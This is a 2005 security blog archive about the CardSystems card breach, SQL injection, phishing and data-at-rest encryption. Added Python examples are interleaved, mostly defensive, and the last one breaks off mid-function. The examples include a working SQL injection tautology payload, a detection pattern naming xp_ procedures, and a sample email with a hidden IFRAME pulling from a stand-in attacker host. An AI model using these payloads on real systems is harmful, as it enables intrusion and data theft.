    I was thinking more along the lines of Christian Bale. He's got the sophisticated, yet hard-edged, look and even the accent, for goodness' sake.

    Plus, from his devastating tour in American Psycho, we know he can handle all of the requisite weaponry: from 9mm handguns to chain-saws and everything in between.

    Daniel Craig to be new James Bond
     

    Which Science Fiction Writer Are You?



    I am:
    Gregory Benford
    A master literary stylist who is also a working scientist.


    Which science fiction writer are you?



    I took the quiz and ended up with Gregory Benford. I'll have to look him up on Amazon. I was kinda hoping for Robert A. Heinlein. Ah well, dare to dream.
     

    Monday, June 20, 2005

    How SQL Injection Works



    It's true that we don't quite know the attack vector that was used to install trojan(s) on the CardSystems network. In my opinion, the three most likely possibilities are:

  • Social engineering: imagine one day you receive an official-looking CD from your company's IT department. It's been snail-mailed to you directly, professionally emblazoned with the company logo and a pompous demand that you install the CD to ensure that your machine's security patches are current. This sort of thing may be what happened in the Israeli corporate espionage case.

  • Inside job: an insider, motivated by money, revenge or other factor, intentionally installed a trojan to expedite delivery of sensitive data to criminal parties.

  • SQL injection: a web application (say, a merchant access system) was compromised through SQL injection and a remote command execution hack (e.g., SQL Server's xp_cmdshell command or similar). Remote command execution offers the possibility of loading a malicious executable from an external FTP site... frightening, eh?

    If you've ever wondered how SQL injection works... and how best to protect yourself against common web application attacks, this overview from UNIXwiz is one of the best I've seen.

    UNIXwiz: SQL Injection - by Example
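The SQL injection possibility above, as an added example that is not from the original post or the UNIXwiz overview: a string-built login query of the kind a merchant access system might use, beside the parameterized form that closes the hole, plus a crude log-side heuristic for spotting injection attempts in request parameters. The table, rows and request strings are constructed for the demo.

```python
"""Added example: vulnerable vs. parameterized SQL, and a request-log heuristic."""
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    """Constructed in-memory stand-in for a merchant access database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE merchants (id INTEGER, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO merchants VALUES (?, ?, ?)",
        [(1, "acme", "s3cret"), (2, "globex", "hunter2")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """Untrusted input is pasted straight into the SQL text: this is the bug.

    Whatever the user types becomes part of the query's structure, so a quote
    in the password ends the string literal and the rest is parsed as SQL.
    """
    sql = "SELECT id FROM merchants WHERE name = '%s' AND password = '%s'" % (
        name,
        password,
    )
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, name, password):
    """Placeholders keep the input as data; the query's structure cannot change."""
    sql = "SELECT id FROM merchants WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


def demo():
    """Run both forms against the same classic tautology payload."""
    conn = make_db()
    injected = "' OR '1'='1"
    return {
        # Becomes: ... name = 'nobody' AND password = '' OR '1'='1'  -> every row
        "vulnerable": login_vulnerable(conn, "nobody", injected),
        # The literal string "' OR '1'='1" matches no stored password -> nothing
        "parameterized": login_parameterized(conn, "nobody", injected),
        "legit": login_parameterized(conn, "acme", "s3cret"),
    }


# Crude detection heuristic for web-server request logs: quote characters,
# comment markers, statement separators, UNION SELECT and extended procedure
# names such as the xp_ family mentioned above. Quotes alone are noisy
# (O'Brien is a real surname), so treat hits as a trigger for review, not proof.
INJECTION_MARKERS = re.compile(r"('|--|;|/\*|\bxp_\w+|\bunion\b\s+\bselect\b)", re.I)


def suspicious_params(query_string):
    """Return the marker substrings found in a URL-decoded query string."""
    decoded = unquote_plus(query_string)
    return [m.group(0) for m in INJECTION_MARKERS.finditer(decoded)]


if __name__ == "__main__":
    print(demo())
    print(suspicious_params("merchant=nobody&pw=%27+OR+%271%27%3D%271"))
```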
     

    More CardSystems Tidbits Emerge


    Picture credit: http://www.massmenus.com
    Interesting information on the CardSystems' security breach... carefully gleaned from multiple reports:

    Item 1: MasterCard announced the breach, which had been detected in May, probably to the consternation of CardSystems. What were the reasons for MasterCard's disclosure? Displeasure with CardSystems in general? A requirement to disclose the breach in a timely fashion, since CardSystems had had over a month? Or was it simply MasterCard demonstrating that it -- not CardSystems -- had discovered the intrusion?

    MasterCard traced the breach to CardSystems based on an unusual pattern of fraudulent transactions...

    "I don't have the detail on what type of fraud it was," Antle said. "It wasn't a large amount of fraud, just an abnormal pattern that triggered our system. ... We have tracking systems in place to find the common point of interaction."

    FBI spokeswoman Deb McCarley would not confirm the intrusion was the result of Internet hacking.


    Sketchy reports indicate that, indeed, a trojan was placed on at least one of CardSystems' computers.

    Item 2: CardSystems said that the FBI asked them not to disclose the breach... but the FBI denies that claim, according to this report. What the... ?

    Item 3: According to the New York Times, CardSystems wasn't even supposed to have this data! While CardSystems processes the transactions, it isn't supposed to retain any records, per its agreements with MasterCard and Visa. It appears that CardSystems somehow kept all of the data, perhaps for its own "research purposes":

    The chief of the credit card processing company... acknowledged yesterday that the company should not have been retaining those records... He said the data was in a file being stored for "research purposes" to determine why certain transactions had registered as unauthorized or uncompleted.

    ...Under rules established by Visa and MasterCard, processors are not allowed to retain cardholder information including names, account numbers, expiration dates and security codes after a transaction is handled.

    "CardSystems provides services and is supposed to pass that information on to the banks and not keep it," said Joshua Peirez, a MasterCard senior vice president who has been involved with the investigation. "They were keeping it."

    ...Jessica Antle, a MasterCard spokeswoman, said that CardSystems had never demonstrated compliance with MasterCard's standards. "They were in violation of our rules," she said.

    It is not clear whether or when MasterCard intervened with the company in the past to insure compliance, but MasterCard said Friday that it had now given CardSystems "a limited amount of time" to do so.

    ...MasterCard said that it had detected atypical levels of fraudulent charges on its cards as early as mid-April and, joined by Visa and an unspecified bank in mid-May, had requested that CardSystems allow its independent forensics team, Ubizen, to investigate. It was not until May 22 that the security specialists identified the rogue computer program as the source, MasterCard said.

    CardSystems said it contacted the F.B.I. offices in Tucson and Atlanta on May 23. The F.B.I. said Friday that its investigation was continuing.


    How did the intruders enter the system? Perhaps a processor's web application for merchants:

    "They typically have a Web site where merchants sign on with and then the merchants can look at the daily transactions, the balance in their account," said Edward Lawrence, a managing associate at the Auriemma Consulting Group in Westbury, N.Y., which advises credit card merchants and processors. "My guess is that a hacker would get into the Web site and somehow find their way past a firewall and through the passwords and encroach onto the programming system."

    Mr. Peirez of MasterCard said that the data inappropriately retained by CardSystems was particularly sensitive because it included cardholders' three- and four-digit security codes, making it more attractive to potential thieves because it can double or triple the black-market value of a cardholder's account. Ms. Litan of Gartner said there was no reason for a processor to store security codes... In addition, the data lost in the CardSystems case was apparently not encrypted. "If it was encrypted, the hacker would have gotten data but would not have known how to read it," said Mr. Lawrence...
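The retention rule quoted above, as an added example that is neither CardSystems' nor the card brands' code: a "research" record for a declined transaction that keeps only what is needed to explain the decline (tokenizing the account number and dropping the security code, expiry and name entirely), plus a scanner for Luhn-valid account numbers that should never appear in stored text. The key, transaction and log line are constructed for the demo.

```python
"""Added example: retain only decline-research fields; scan stored text for raw PANs."""
import hashlib
import hmac
import re

# Assumption: a per-deployment secret so the same card yields the same token
# across records without the account number itself being kept anywhere.
TOKEN_KEY = b"constructed-demo-key"

# What a "why did this transaction fail" file legitimately needs.
RESEARCH_FIELDS = ("txn_id", "merchant_id", "timestamp", "amount", "response_code")
# What the brand rules say a processor must not keep once a transaction is handled.
FORBIDDEN_FIELDS = ("pan", "cvv", "cvv2", "security_code", "expiry", "cardholder_name")

# 13 to 19 digit runs not embedded in a longer digit run.
PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Mod-10 check that separates card numbers from other long digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def pan_token(pan: str) -> str:
    """Keyed hash of the PAN: lets records be correlated without storing the number."""
    return "tok_" + hmac.new(TOKEN_KEY, pan.encode(), hashlib.sha256).hexdigest()[:24]


def research_record(txn: dict) -> dict:
    """Build the only record that may be kept after the transaction is handled."""
    pan = txn["pan"]
    out = {k: txn[k] for k in RESEARCH_FIELDS if k in txn}
    out["pan_last4"] = pan[-4:]
    out["pan_token"] = pan_token(pan)
    # Belt and braces: refuse to emit a record that somehow carries forbidden fields.
    leaked = set(out) & set(FORBIDDEN_FIELDS)
    if leaked:
        raise ValueError(f"forbidden fields in retained record: {sorted(leaked)}")
    return out


def find_leaked_pans(text: str) -> list:
    """Scan a log line or dump for Luhn-valid 13-19 digit runs (likely card numbers)."""
    return [m for m in PAN_RE.findall(text) if luhn_ok(m)]


# Constructed sample: one authorization that came back declined (response code 05).
SAMPLE_TXN = {
    "txn_id": "T-000042",
    "merchant_id": "M-4471",
    "timestamp": "2005-05-22T03:14:00Z",
    "amount": "19.95",
    "response_code": "05",
    "pan": "4111111111111111",   # well-known test number, Luhn-valid
    "expiry": "0807",
    "cvv": "123",
    "cardholder_name": "J. Doe",
}

# Constructed log line of the kind the page says should never have been written.
# The 14-digit reference number is not Luhn-valid, so only the PAN is reported.
SAMPLE_LOG = "2005-05-22 DECLINED pan=4111111111111111 cvv=123 merchant=M-4471 ref=20050522031400"

if __name__ == "__main__":
    print(research_record(SAMPLE_TXN))
    print(find_leaked_pans(SAMPLE_LOG))
```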

     

    Security? What Security?


    Picture credit: http://www.regiononline.com
    IT-Director's Robin Bloor has some choice commentary on the news that CardSystems may have exposed some forty million accounts to cyber-crooks:

    ...The secret is out: "corporate America is inadequately protected against data theft." I think there's a crisis in the making – in fact, there is. The news is not good for you and I, but it is for the IT security vendors, who have clearly not been selling enough of their fine products to stop the rot.

    On Thursday of last week the US FTC (Federal Trade Commission) pronounced judgment on BJ Wholesale, a company that had failed to protect customer data from identity theft. Its judgment was that BJ Wholesale should undergo a security audit every 2 years for the next 20 years. This doesn't sound like much of a penalty, but there can be little doubt that BJ Wholesale is going to have to spend heavily on IT security. It will cost them many green dollars, and woe betide BJ if it fails any of these audits...

    [CardSystems' stolen forty million accounts] ...sounds more like a spirited attempt to get into the Guinness Book of Records than a security breach ("What, ChoicePoint only exposed 140,000 identities? We'll show them").

    The press reports suggest that CardSystems was targeted by hackers, which seems highly likely. However, it is all a little confused as some reports claimed that the vulnerability was caused by a virus attack. Right now the full details may not be known. It was MasterCard that uncovered the problem. In investigating fraudulent transactions, it was able to deduce where the data was being stolen. Hats off to MasterCard. Visa and American Express, who also had millions of customers affected, should thank them.

    MasterCard is, however, deeply unimpressed with CardSystems. It says that CardSystems was storing card holder's account numbers and security codes on its computers in violation of MasterCard rules...


    Robin Bloor: Security? What Security?
     

    From the miscellaneous items department...


    Picture credit: NBA
    The Spurs' Tim Duncan is one of the smartest and classiest players in the NBA. But a recent interview with his coach, Gregg Popovich, provided some unintended mental imagery:

    "He's exactly the same person that I laid on the sand with down in St. Croix when we drafted him," added Spurs coach Gregg Popovich. "He hasn't changed a lick, very honestly..."


    NBA.com: The Quiet Storm
     

    YubNub: A (social) command-line for the web


    Here's a really interesting idea, courtesy of John Battelle's Searchblog. YubNub is a "command-line for the web" with a social-networking spin.

    Want to do an image search on Google for Anne Bancroft? Type in gim anne bancroft. How about viewing the Wikipedia entry for Bob Knight? Just type in wp bob knight.

    Want to create your own commands? That's where the social-networking aspect comes into play. You can add your own syntax to YubNub.

    Check it out: YubNub
     

    Saturday, June 18, 2005

    CardSystems' missing 40 million records



    Photo
    Two consumers enjoying their privacy (CardSystems)

    The details are sketchy, yet ominous. As many as forty million consumer credit-card records may have been stolen from CardSystems, a major payment-processing house.

    The theft was discovered back on May 22nd. And CardSystems seems none too pleased that MasterCard has disclosed the extent of the breach. Publicly, MasterCard indicated that:

    ...an intruder was able to use security vulnerabilities to infiltrate the CardSystems network and access the cardholder data...


    In addition, MasterCard reported that:

    ...CardSystems Solutions was hit by a computer virus that sucked up card numbers and other customer data...


    Who was behind it? Probably organized crime, at least based upon information in this Boston Globe article:

    ...MasterCard said yesterday that criminals used a computer virus to collect vast amounts of financial data moving through the company's computer network and estimated that 13.9 million of its accounts may have been stolen. Thieves also had access to millions of cards issued by Visa and Discover, as well as some American Express cards...

    ...examination of CardSystems computers found that information had been copied from a database containing 40 million account numbers from a variety of credit card brands. It also found that the CardSystems network had been infected sometime late last year, meaning that the data thieves had been able to collect credit card numbers for several months before the breach was detected.

    The investigators found that some of the stolen card numbers have been used illegally. ''We are aware of some fraud from the data that's been taken," said Jessica Antle, spokeswoman for MasterCard International. She added that the thieves had used very few of the stolen account numbers so far...


    Some expressed surprise that a breach of this scale was possible:

    ...Former federal prosecutor Mark Rasch, chief technical counsel for computer security firm Solutionary Inc., was surprised by the scale of the crime. ''It's not surprising that there's a breach," Rasch said. ''It is surprising that there's this large a breach." Rasch said that the data-stealing computer virus should have been quickly detected if CardSystems ran regular virus scans...


    Was it a virus... or something altogether different? The LA Times, via Slate, says:

    ...a "rogue program" planted in the computer network of CardSystems compromised millions of card numbers...


    The FBI is probably hunting down possibilities of an inside job or an Israeli-style social engineering scam (the recent Israeli corporate espionage debacle included trojans that were snail-mailed to victims as software updates from a corporate IT department).

    Ironically, CardSystems' website boasts of its e-Payment Systems offering:

    ...In today's information age, new technologies... increase the risk of fraud as perpetrators find new ways to infiltrate systems. You need payment solutions that help you grow revenue and maximize efficiencies while mitigating fraud...


    Yes, we do. That's their mission statement, eh? Repeat after me: forty... million... records.

    And now CardSystems' livelihood itself may be at stake. MasterCard has reportedly given CardSystems "an undisclosed deadline to demonstrate that its systems are now secure".

    That ought to be quite a demonstration.

    After reports like this one and the Israeli trojan horse scandal, one is left only to speculate how much cyber-criminal activity remains ongoing and completely undetected.
     

    Friday, June 17, 2005

    PayPal's Comical Anti-Phishing Page


    Picture credit: http://microsoft.com
    I have a PayPal account, which I use only sporadically. And I just received an email purporting to be from PayPal itself, which addresses anti-phishing techniques. This should be fun. Let's review PayPal's advice for avoiding phishing scams (which they call spoofing). Entitled "Protect Yourself from Fraudulent Emails", it's actually somewhat comical.

    Here's the first "warning sign" of a bogus email, according to PayPal:

    Generic greetings.
    Many spoof emails begin with a general greeting, such as: "Dear PayPal member."


    In other words, the spammers can't address you by name.

    According to the security page, after you recognize a phishing attempt, you are advised to immediately contact their anti-fraud department:

    Forward the entire email - including the header information - or the site's URL to spoof@paypal.com. We investigate every spoof reported. Please note that the automatic response you get from us may not address you by name.


    Talk about an enigma wrapped in a riddle... PayPal advises you to report any bogus email purporting to be from their organization. The first way to recognize a fraudulent email is a generic greeting. And when you send in a report of a phishing attempt, PayPal responds with another email that (using their criteria) also appears to be bogus. For the love of...

    And here's warning #3:

    Fake Links.
    The text in a link may attempt to... send you to a spoof address [sic]... be aware that a fake link may even have the word "PayPal" in it.


    Interesting. First problem: the PayPal anti-fraud page uses a domain name of paypalobjects.com, not paypal.com. What the...? Can't anyone here play this game?
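The two warning signs discussed above turned into a check, as an added example that is not PayPal's code: it flags a generic greeting, any link whose destination is not the one domain we trust (so paypalobjects.com is reported, exactly as the page complains), and any link whose visible text shows one domain while the href goes to another. The sample email is constructed, and the trusted-domain set is an assumption.

```python
"""Added example: flag generic greetings and fake links in an HTML email."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only registrable domain accepted as "really PayPal".
TRUSTED_DOMAINS = {"paypal.com"}

# Warning sign #1 from the page: "Dear PayPal member" and friends.
GENERIC_GREETING = re.compile(
    r"\bdear\s+(?:paypal\s+)?(?:member|customer|user|client)\b", re.I
)


class LinkCollector(HTMLParser):
    """Gather every <a href> with its visible text, plus all body text."""

    def __init__(self):
        super().__init__()
        self.links = []   # (href, visible text)
        self.text = []    # all character data, for the greeting check
        self._href = None
        self._label = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._label = []

    def handle_data(self, data):
        self.text.append(data)
        if self._href is not None:
            self._label.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._label).strip()))
            self._href = None


def registrable_domain(host: str) -> str:
    """Crude last-two-labels rule; enough to tell paypal.com from paypalobjects.com.

    A real deployment would use the public suffix list (co.uk and similar).
    """
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def host_of(url: str) -> str:
    return urlparse(url).hostname or ""


def check_email(html: str) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    if GENERIC_GREETING.search(" ".join(parser.text)):
        findings.append("generic greeting")
    for href, label in parser.links:
        dest = registrable_domain(host_of(href))
        if dest not in TRUSTED_DOMAINS:
            findings.append(f"untrusted destination: {href}")
        # Warning sign #3: link text that looks like a URL but points elsewhere.
        if label.lower().startswith(("http://", "https://")):
            shown = registrable_domain(host_of(label))
            if shown != dest:
                findings.append(f"text shows {shown} but href goes to {dest or 'nowhere'}")
    return findings


# Constructed sample in the style of the emails the page describes
# (203.0.113.9 is a documentation address, not a real host).
SAMPLE_EMAIL = """
<p>Dear PayPal member,</p>
<p>Please confirm your account at
<a href="http://203.0.113.9/paypal/login">https://www.paypal.com/login</a>.</p>
<p>Read our <a href="https://www.paypalobjects.com/help">security page</a>.</p>
"""

if __name__ == "__main__":
    for finding in check_email(SAMPLE_EMAIL):
        print(finding)
```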

    Yet another interesting aspect to the PayPal anti-fraud message is their attempt to get you to download a "helpful toolbar". Here's more from their security page:

    ...If you use Internet Explorer, download the eBay toolbar. Account Guard helps ensure you are on PayPal or eBay. Download the eBay toolbar now...


    This is almost too easy. My prediction is that phishers will create and pitch a fake eBay toolbar using their typical, massive spamming campaigns. For the phishers, this is an even better deal. Users will install a truly malevolent trojan themselves, all under the guise of increased security.

    You heard it here first.

    In my opinion -- and, for at least the three reasons listed above -- the PayPal anti-phishing page leaves a lot to be desired.

    The only realistic way to deal with the phishing scourge is to use digital signatures and intelligent email clients (preferably web-based) to ensure that the guy who says he sent the file really did so. Yahoo has released a proposed standard called DomainKeys that does exactly that.

    I think I'll wait for DomainKeys, thank you.

    PayPal: Protect Yourself from Fraudulent Emails
     

    Thursday, June 16, 2005

    Fraudsters use iPods to steal company information


    Picture credit: http://www.conversionfury.com
    There are more options for ripping off sensitive data than there are noodles at Johnny Chan's Take-Out joint. All the more reason to ensure that your company's sensitive data is always encrypted at rest.

    Anti-fraud experts warned yesterday that the machines, along with other music players that boast hard drives with up to 20Gbytes of memory, could become widely used by employees to fool security officials and breach data security rules.

    In one case a recruitment agency found much of its client database had been copied to an iPod's memory and used to defraud the firm.


    Guardian: Fraudsters use iPods to steal company information
     

    Wednesday, June 15, 2005

    The Next Generation of Phishing Tools


    (Picture credit http://www.carrera-uk.com)
    The folks at SC Magazine -- or, maybe just Maksym Schipka -- describe the interesting ramifications of program complexity. Windows XP, according to Schipka, consists of a scant 40 million lines of code. A conservative figure of five bugs per KLOC (one thousand lines of code) yields the potential of perhaps 200,000 bugs. Schipka posits that about one-tenth of one percent of that figure will be remote-execution security issues: in other words, about 200 serious remote vulnerabilities.

    Worse, the trend towards blended, polymorphic attacks continues unabated. Recent generations of trojans blatantly scan for vulnerabilities, rip down defensive barriers such as anti-virus protection, and hijack trusted applications and libraries.

    From the phishing perspective, the trend is equally serious:

    ...A recent phishing attack, purporting to be a communication from a major UK bank to its customers, provides a significant pointer to likely future developments in the email banditry arena.

    It works like this: customers receive an email that makes the usual phishing bid to gain personal banking details -- but it also has a more purposeful payload. Before attempting the phish, it first uses an IFRAME exploit to download a trojan installer without the user's knowledge.

    The installer checks a number of parameters on the system -- for example, the versions of Windows and Internet Explorer being used, whether Norton AV updater or McAfee AV updater are running and what version of Java Virtual Machine is in use. Based on the information it collects, the installer chooses one of the four different exploits to perform the trojan executable drop.

    The innovation here is that, not only are different exploits and vulnerabilities used to penetrate the user's computer, but also that a trojan installer is an integral component of the phishing attempt.

    If this new technique proves as successful as its criminal perpetrators surely hope, we can expect to see even greater uses of such convergence in the future. With the prospect of spam messages arriving in your inbox trying to sell you a product while attempting also to obtain your personal banking information -- and planting a trojan on your computer at the same time -- the case for adopting comprehensive email security has surely never been more pressing...
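
    The article's attack hinges on an IFRAME that the recipient never sees, pulled from a host that has nothing to do with the bank. A mail gateway can flag exactly that combination before the message reaches a desktop. The Python below is an added example written for this post, not code from SC Magazine, Schipka or this blog: it parses an HTML body with the standard-library parser and reports any IFRAME that is rendered invisibly (zero or one-pixel size, or a hiding style) or whose source host falls outside the purported sender's domain. The two message bodies and the domains (bank.example.com, attacker.example.net) are constructed samples.

```python
"""Flag hidden or cross-domain IFRAMEs in an HTML e-mail body (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a lure styled as the bank's mail, carrying a zero-size
# IFRAME that pulls content from an unrelated host.
SAMPLE_PHISH = """<html><body>
<p>Dear customer, please confirm your online banking details below.</p>
<iframe src="http://attacker.example.net/inst.html" width="0" height="0"
        frameborder="0" style="display:none"></iframe>
</body></html>"""

# Constructed sample of a legitimate mailing with a visible, same-domain frame.
SAMPLE_BENIGN = """<html><body>
<p>Your monthly statement is ready.</p>
<iframe src="https://www.bank.example.com/promo" width="300" height="150"></iframe>
</body></html>"""

HIDING_STYLES = ("display:none", "visibility:hidden")


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _int_attr(attrs, name):
    """Leading integer of a size attribute ('0', '1px', '300'), or None if absent."""
    match = re.match(r"\s*(\d+)", attrs.get(name, ""))
    return int(match.group(1)) if match else None


def _is_hidden(attrs):
    """A frame is hidden if styled away or sized so small the recipient cannot see it."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if any(h in style for h in HIDING_STYLES):
        return True
    width, height = _int_attr(attrs, "width"), _int_attr(attrs, "height")
    return (width is not None and width <= 1) or (height is not None and height <= 1)


def _same_org(host, sender_domain):
    """True if host is the sender's domain or a subdomain of it."""
    return host == sender_domain or host.endswith("." + sender_domain)


def suspicious_iframes(html_body, sender_domain):
    """Return [(src, [reasons])] for each IFRAME that is hidden or points off-domain."""
    parser = IframeCollector()
    parser.feed(html_body)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and not _same_org(host, sender_domain):
            reasons.append("src host %s is outside sender domain %s" % (host, sender_domain))
        if _is_hidden(attrs):
            reasons.append("frame is hidden (zero size or hiding style)")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for label, body in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(label, suspicious_iframes(body, "bank.example.com"))
```

    Either reason on its own is worth a quarantine decision: a visible frame from a third party is unusual in transactional mail, and a hidden one from the sender's own domain is a sign the sending side has been compromised. Pair the check with a rule that strips or neuters the frame rather than merely logging it, since the download happens at render time.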


    This conforms pretty much exactly with Counterpane's assessment. Blackhat activities revolve around criminal, not recreational, endeavors. Bruce Schneier:

    Another 2004 trend that we expect to continue in 2005 is crime. Hacking has moved from a hobbyist pursuit with a goal of notoriety to a criminal pursuit with a goal of money. Hackers can sell unknown vulnerabilities -- "zero-day exploits" -- on the black market to criminals who use them to break into computers. Hackers with networks of hacked machines can make money by selling them to spammers or phishers. They can use them to attack networks. We have started seeing criminal extortion over the Internet: hackers with networks of hacked machines threatening to launch DoS attacks against companies. Most of these attacks are against fringe industries -- online gambling, online computer gaming, online pornography -- and against offshore networks. The more these extortions are successful, the more emboldened the criminals will become.

    We expect to see more attacks against financial institutions, as criminals look for new ways to commit fraud. We also expect to see more insider attacks with a criminal profit motive. Already most of the targeted attacks -- as opposed to attacks of opportunity -- originate from inside the attacked organization's network...


    One thing is for certain: endpoint security has never been more critical.

    SC Magazine: The Potential for Bugs
     

    Top Open-Source Security Applications


    Picture credit: http://www.f-secure.de
    If open-source security applications suit your taste (and, frankly, they should), NewsFactor reports on the top 'brands' of the OSS security world:

    OpenSSL: Anthony Nadalin, Chief Security Architect for IBM's software group, recommends Bouncy Castle crypto interfaces and OpenSSL -- an open-source implementation of the secure sockets layer (SSL) and transport layer security (TLS) protocols...

    OpenSSH: OpenSSH is another software package that comes highly recommended. This open-source implementation of the Secure SHell (SSH) session technology is designed to let administrators and users open a command shell on a remote host...

    Nessus: When it comes down to it, no matter what security system you use, you'll need to test for security vulnerabilities in your code. Both Jaquith and Moyle rate Nessus as a top-tier open-source vulnerability scanner...

    Nmap: Moyle and Jaquith recommend the Nmap port scanner, which is designed to interrogate remote hosts to see what services they are running. The open-source application usually can detect the operating system correctly as well... "For example, many companies use it to 'sweep' their networks to see what hosts are there, and to see if any of them are running services that would violate policy."

    IPtables: IPTables and IPFW are host-based firewalls for Linux and BSD, respectively. Both of them do the same thing: They block access to particular server ports using a flexible rule-based language...

    ClamAV: Barracuda Networks' Levow sees considerable merit in the use of open-source antivirus and antispam tools, and specifically points to ClamAV as the largest and also most widely used open-source antivirus technology...


    NewsFactor: Top Open-Source Security Applications
     

    Frequency Jamming


    Picture credit: http://www.faa.gov
    Like handheld lasers pointed at airliners to (presumably) blind pilots, this Washington Times report is somewhat ominous:

    ...Shortly before touching down in Charlotte, the pilot announced to passengers that the landing was being delayed because somebody was "jamming" the plane's communications with the control tower.
    "We have a jamming problem," the lawyer, who asks not to be identified, paraphrased the pilot. "We've gotten word from the tower that our radio frequencies are being jammed."
    Then these words: The problem could "involve national security."

    ..."Unless you find the source, you're not sure if it's inadvertent or on purpose. As you know from reporting on the lasers [being beamed at pilots from the ground], laser incidents go back 10 years. But it wasn't until the September 11th attacks that we have to look at everything through national security lines now."


    Washington Times: Jamming
     

    Now that's a concert


    Picture credit: http://www.espn.com
    From the miscellaneous items department:

    Suspended Florida State quarterback Wyatt Sexton was doused by pepper spray and taken to a hospital by police after he was found lying in the street, saying he was God...

    ...Police said Sexton's roommates told them he had been at a Dave Matthews Band concert in Tennessee with them earlier Monday...

    ...However, The Dave Matthews Band played in Noblesville, Ind., on Sunday and Monday.


    Enquirer.com: College Football Notebook
     

    Tuesday, June 14, 2005

    Protecting Data At Rest


    Picture credit: http://www.unixwiz.net
    Over at RedmondMag, Roberta Bragg notes some good starting points for protecting data at rest. Data 'at rest' means data stored statically on some media: hard disk, tape backup, etc. When sensitive data items -- like SSNs -- are stored in the clear, they're literally sitting ducks for hacking attempts.

    Overall her point is, as mine was a few days ago, that data 'at rest' needs a comprehensive set of data protection standards. Roberta provides a good checklist that IT teams can use to vet their standards against best practices.

    However, I believe she's omitted one quite crucial step in protecting data:

    Sensitive data should be encrypted at the application level. That is, even if you have an encrypted file system, don't trust that it alone will be sufficient to keep blackhats at bay. Go the extra mile and ensure that sensitive fields (SSNs, for instance) are encrypted at the application level. Force your application to securely retrieve decryption keys in order to convert the fields into cleartext data.

    Why? What's the risk?

    One with which I'm familiar is the old favorite, SQL injection. SQL injection permits an intruder to craft their own SQL statements and submit them against your databases. Thus, if SSNs are stored in the clear (at the field level), a SQL injection hack could rip the SSNs straight out of your tables. No muss and no fuss for the intruder.

    Thus, I recommend that all sensitive data be encrypted -- at the application level -- in the tables themselves. At least then, if a rogue process were to compromise your database, the intruder would still have to mount a separate attack against the sensitive fields. Force the bad guys to go the extra mile.
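
    To make the point concrete, here is an added example written for this post (not code from RedmondMag, Roberta Bragg or this blog). It stores SSNs in a SQLite table as application-encrypted blobs, puts a string-concatenated query beside a parameterised one, and shows that the classic "everything is true" injection dumps every row from the vulnerable query yet yields only ciphertext, while the application, holding the key, still decrypts normally. Assumptions: the key is a constructed demo value (in practice the application fetches it at runtime from a secrets store or HSM, never from the database host), the records are constructed, and the cipher is a standard-library stand-in (HMAC-SHA256 in counter mode, encrypt-then-MAC) used so the block runs without third-party packages.

```python
"""Field-level encryption of SSNs beside vulnerable and parameterised queries (added example)."""
import hashlib
import hmac
import os
import sqlite3

# Constructed demo key. A real application pulls this from a secrets manager or
# HSM at runtime; it never sits next to the data it protects.
DEMO_KEY = hashlib.sha256(b"constructed demo key, not for real use").digest()

# Constructed sample records.
SAMPLE_CUSTOMERS = [("Alice", "123-45-6789"), ("Bob", "987-65-4321")]


def _keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode as a PRF keystream: a stdlib stand-in for AES-CTR."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def encrypt_field(key, plaintext, nonce=None):
    """Encrypt-then-MAC one field; returns nonce || ciphertext || tag."""
    enc_key = hmac.new(key, b"field-enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"field-mac", hashlib.sha256).digest()
    nonce = os.urandom(16) if nonce is None else nonce
    data = plaintext.encode("utf-8")
    ciphertext = bytes(a ^ b for a, b in zip(data, _keystream(enc_key, nonce, len(data))))
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def decrypt_field(key, blob):
    """Verify the tag first, then decrypt; any modification raises ValueError."""
    enc_key = hmac.new(key, b"field-enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"field-mac", hashlib.sha256).digest()
    nonce, ciphertext, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("field ciphertext failed authentication")
    data = bytes(a ^ b for a, b in zip(ciphertext, _keystream(enc_key, nonce, len(ciphertext))))
    return data.decode("utf-8")


def tamper_detected(key, blob):
    """True if flipping one ciphertext bit is rejected by the tag check."""
    damaged = blob[:16] + bytes([blob[16] ^ 0x01]) + blob[17:]
    try:
        decrypt_field(key, damaged)
    except ValueError:
        return True
    return False


def build_db(key):
    """In-memory table whose SSN column holds only application-encrypted blobs."""
    conn = sqlite3.connect(":memory:")
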